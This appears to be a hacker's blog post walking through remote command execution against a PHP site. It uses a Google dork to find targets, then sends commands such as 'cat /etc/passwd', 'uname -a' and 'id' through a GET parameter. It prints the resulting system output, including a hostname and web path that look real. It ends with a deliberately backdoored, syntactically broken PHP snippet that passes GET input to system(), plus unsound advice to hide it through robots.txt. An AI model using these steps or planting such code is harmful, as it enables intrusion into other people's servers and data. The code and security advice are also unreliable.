A history of hack!

Remote Code Execution via PHP GET variable.

Searching for vulnerable link dorking with google:

inurl:"*.php?lol="

Found something…

http://www.sito.com/page.php?var=

Try some stuffs…

http://www.sito.com/page.php?var='

Nothing happens

http://www.sito.com/page.php?var=ls

Something happens :)

Get the current directory list.

http://www.sito.com/page.php?var=ls

CHANGELOG.php
 COPYRIGHT.php
 CREDITS.php
 LICENSE.php
 LICENSES.php
 administrator
 cache
 components
 configuration.php
 configuration.php-dist
 htaccess.txt
 images
 includes
 index.html.bak
 index.php
 index2.php
 language
 libraries
 logs
 media
 metaconfig.xml
 migration
 mod_acajoom.php
 mod_acajoom.xml
 modules
 plugins
 robots.txt
 templates
 tmp
 xmlrpc

-Get the list of the administrator directory.

http://www.sito.com/page.php?var=ls administrator

backups
 cache
 components
 help
 images
 includes
 index.php
 index2.php
 index3.php
 language
 modules
 templates

Catting the /etc/passwd file.

http://www.sito.com/page.php?var=cat /etc/passwd

# $FreeBSD: src/etc/master.passwd,v 1.40.22.2 2011/03/28 17:41:10 trociny Exp $
 #
 root:*:0:0:Charlie &:/root:/bin/csh
 toor:*:0:0:Bourne-again Superuser:/root:
 daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
 operator:*:2:5:System &:/:/usr/sbin/nologin
 bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
 tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
 kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
 games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
 news:*:8:8:News Subsystem:/:/usr/sbin/nologin
 man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
 sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
 smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
 mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
 bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
 proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
 _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
 _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
 uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
 pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
 www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
 hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
 nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
 admin:*:500:500:Systems Administrator:/home/admin:/bin/sh
 alias:*:81:81:QMail user:/var/qmail/alias:/nonexistent
 qmaild:*:82:81:QMail user:/var/qmail:/nonexistent
 qmaill:*:83:81:QMail user:/var/qmail:/nonexistent
 qmailp:*:84:81:QMail user:/var/qmail:/nonexistent
 qmailq:*:85:82:QMail user:/var/qmail:/nonexistent
 qmailr:*:86:82:QMail user:/var/qmail:/nonexistent
 qmails:*:87:82:QMail user:/var/qmail:/nonexistent

Get the system version.

http://www.sito.com/page.php?var=uname -a

FreeBSD unix3.alpha.hostsg.com 8.2-STABLE FreeBSD 8.2-STABLE #1: Wed Oct  5 01:26:08 SGT 2011     admin@master1.alpha.hostsg.com:/usr/obj/usr/src/sys/X9SCD  amd64

Get the current path.

http://www.sito.com/page.php?var=pwd

/home/web/singaporeultimat/public_html

And the userid with the group id.

http://www.sito.com/page.php?var=id

uid=80(www) gid=80(www) groups=80(www)

Conclusions: if you really need a variable that allow you to execute command on the local machine make sure you create a robots.txt file that contains the path for preventing google dork discover this.

How to make a PHP GET variable that allow you to execute arbitrary command on the local machine.
Just type in the .php files this strings:

if (isset($_GET['name'])){
$output=system ($_GET['name')}; //maybe in specify machine cloud be exec()
$echo $output;
}

-Than in the browser:

http://victim.com/page=1?name=ls

# End - Razor4x